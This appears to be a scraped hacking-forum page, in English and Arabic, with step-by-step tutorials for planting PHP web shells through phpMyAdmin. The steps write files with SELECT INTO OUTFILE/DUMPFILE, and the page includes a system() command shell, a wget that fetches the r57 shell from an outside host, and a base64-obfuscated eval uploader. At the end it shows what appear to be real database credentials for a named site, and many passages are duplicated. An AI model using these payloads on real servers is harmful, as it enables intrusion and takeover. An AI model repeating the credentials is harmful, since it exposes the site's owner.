مشاهدات الان
Requirements:-
then 'SQL'
-You must have the full path
-pma & mysql db privileges.
Its not every day u get to use this its rare, but today i exploited a site by this so thought of writing a tutorial. Ok then lets start.
First login in to mysql
now click 'Show MySQL system varible"
-pma & mysql db privileges.
Its not every day u get to use this its rare, but today i exploited a site by this so thought of writing a tutorial. Ok then lets start.
First login in to mysql
now click 'Show MySQL system varible"
then 'SQL'
now you can run sql commands,like create db, delete tables or whatever. we want to upload shell so lets move on to it.
now we will create a cmd line into a new file,with select into.
SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"
and click 'Go'
now we will create a cmd line into a new file,with select into.
SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"
and click 'Go'
Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell
wget http://www.r57.biz/r57.txt;mv r57.txt shell.php
N thats it, we have shell on the server xD
Stay Safe and gud luck :)
Stay Safe and gud luck :)
السلام عليكم و رحمة الله و بركاته
كيف حالكم ؟
انشاء الله بخير
اليوم ساقدم لكم شرح لثلات طرق لرفع الشل من لوحة PHPMyAdmin
بدون اطالة نبدا على بركة الله
======================={الطريقة 1}=======================
اعمل قاعدة بيانات جديدة باسم : db
واذهب الى اوامر SQL
و اكتب الآتي :
و نذهب الى المسار اللي كتبناه نجد الشل بتاعنا
انتهينا من الطريقة الاولى
======================={الطريقة 2}=======================
عمل قاعدة بيانات جديدة 'shell'
نكتب في name: shell و fields :1
نضغط Insert
ونضع كود الشل
ثم نذهب الى اوامر SQL
و نكتب
SELECT * FROM shell INTO OUTFILE
'مكان الشل '
نذهب الى المسار اللي كتبناه نجد الشل بتاعنا
هذي الطريقة الثانية
======================={الطريقة 3}=======================
نعمل قاعدة بيانات جديدة 'Sn!p3r_GS' مثلا
ثم نذهب لاوامر SQL
و نطبق الكود التالي
الان نذهب الى المسار راح تجد املف لاكن لايظهر
ما تخاف حبيبي ، فقط اعمل اعد اظهار الملف او اظغط F5 و راح تجده ^_^
اتمنى ان الشرح للطرق الثلات يكون مفهوم انشاء الله
كان معكم اخوكم : Sn!p3r_GS
تنبيه هكركوز الكويت يزيد التالي
كيف حالكم ؟
انشاء الله بخير
اليوم ساقدم لكم شرح لثلات طرق لرفع الشل من لوحة PHPMyAdmin
بدون اطالة نبدا على بركة الله
======================={الطريقة 1}=======================
اعمل قاعدة بيانات جديدة باسم : db
واذهب الى اوامر SQL
و اكتب الآتي :
اولا CREATE TABLE `db`.`UserForm` (`track1` VARCHAR( 10000 ) NOT NULL) ENGINE = MyISAM;
ثانيا INSERT INTO UserForm VALUES ('كود الشل');
ثالثا SELECT * INTO DUMPFILE 'مكان الشل' from UserForm
و نذهب الى المسار اللي كتبناه نجد الشل بتاعنا
انتهينا من الطريقة الاولى
======================={الطريقة 2}=======================
عمل قاعدة بيانات جديدة 'shell'
نكتب في name: shell و fields :1
نضغط Insert
ونضع كود الشل
ثم نذهب الى اوامر SQL
و نكتب
SELECT * FROM shell INTO OUTFILE
'مكان الشل '
نذهب الى المسار اللي كتبناه نجد الشل بتاعنا
هذي الطريقة الثانية
======================={الطريقة 3}=======================
نعمل قاعدة بيانات جديدة 'Sn!p3r_GS' مثلا
ثم نذهب لاوامر SQL
و نطبق الكود التالي
SELECT "<? eval(base64_decode('JGMgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJ
aUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRH
RWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNj
OGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhw
Ym5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZ
V3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhT
QTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjEx
YkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJs
WTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5D
Z2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BH
SnlQaWM3SUgwTkNuME5DajgrIik7DQokZiA9IGZvcGVuKCJxOGhhY2sucGhwIiwidyIpOw0KZndy
aXRlKCRmLCRjKTs=')); ?>" INTO OUTFILe "C:/AppServ/www/q8hack.php"
الان نذهب الى المسار راح تجد املف لاكن لايظهر
ما تخاف حبيبي ، فقط اعمل اعد اظهار الملف او اظغط F5 و راح تجده ^_^
اتمنى ان الشرح للطرق الثلات يكون مفهوم انشاء الله
كان معكم اخوكم : Sn!p3r_GS
تنبيه هكركوز الكويت يزيد التالي
PhpMyAdmin
اول الدخول
show php infrmation
صفحه فرعيه تختار تيكست من القواعد
نضغط باسم الشيل ورقم واحد
بعدين نتختار من الشريط الملف الذي ينسق الشيل بمثال تيكست او غيره من خانته
type
ونحط رقم واحد وحفظ
بعدها نضغط
lnsert
وبعدها نجيب الشيل المطلوب ونضعها بخانه المربع امامك باسم
value
بعدين حفظ وتابع القبول !؟ اذا اوكي تابع بضغط على
sql
يطلعلك خانه بها هذي الجمله
select*from"shell"where 1
تمسحها وتحط
select*from shell into outfile*
بعدين تروح صفحه
php version
وتختار مسار الملف لموقع !!! او بذكائك
document_root ???
تضيفها بمسار
select*from shell into outfile*
وتسوي حفظ
بعدها انتبهــــــ اذا نجحت في المهمه × ترجع باك مممممممممممممهم جدا لتعديل رابط شيلك
يطلعلك كلمه
select*
from shell
into outfile* C:/>>> /hkrkoz.php"
وتسوي حفظ
مبررررررررررررروك روح طبقها على الاكسبلور مع اضافه هكركوز
phpMyAdmin - ChangeLog
اول الدخول
show php infrmation
صفحه فرعيه تختار تيكست من القواعد
نضغط باسم الشيل ورقم واحد
بعدين نتختار من الشريط الملف الذي ينسق الشيل بمثال تيكست او غيره من خانته
type
ونحط رقم واحد وحفظ
بعدها نضغط
lnsert
وبعدها نجيب الشيل المطلوب ونضعها بخانه المربع امامك باسم
value
بعدين حفظ وتابع القبول !؟ اذا اوكي تابع بضغط على
sql
يطلعلك خانه بها هذي الجمله
select*from"shell"where 1
تمسحها وتحط
select*from shell into outfile*
بعدين تروح صفحه
php version
وتختار مسار الملف لموقع !!! او بذكائك
document_root ???
تضيفها بمسار
select*from shell into outfile*
وتسوي حفظ
بعدها انتبهــــــ اذا نجحت في المهمه × ترجع باك مممممممممممممهم جدا لتعديل رابط شيلك
يطلعلك كلمه
select*
from shell
into outfile* C:/>>> /hkrkoz.php"
وتسوي حفظ
مبررررررررررررروك روح طبقها على الاكسبلور مع اضافه هكركوز
phpMyAdmin - ChangeLog
http://sql.diversio.home.pl/sql/
diversio
7119klub691116
http://www.diversio.home.pl/
// Username
$config['dbuser'] = 'diversio';
//User-Pass. For no Password leave empty
$config['dbpass'] = '7119klub691116';
diversio
7119klub691116
http://www.diversio.home.pl/
// Username
$config['dbuser'] = 'diversio';
//User-Pass. For no Password leave empty
$config['dbpass'] = '7119klub691116';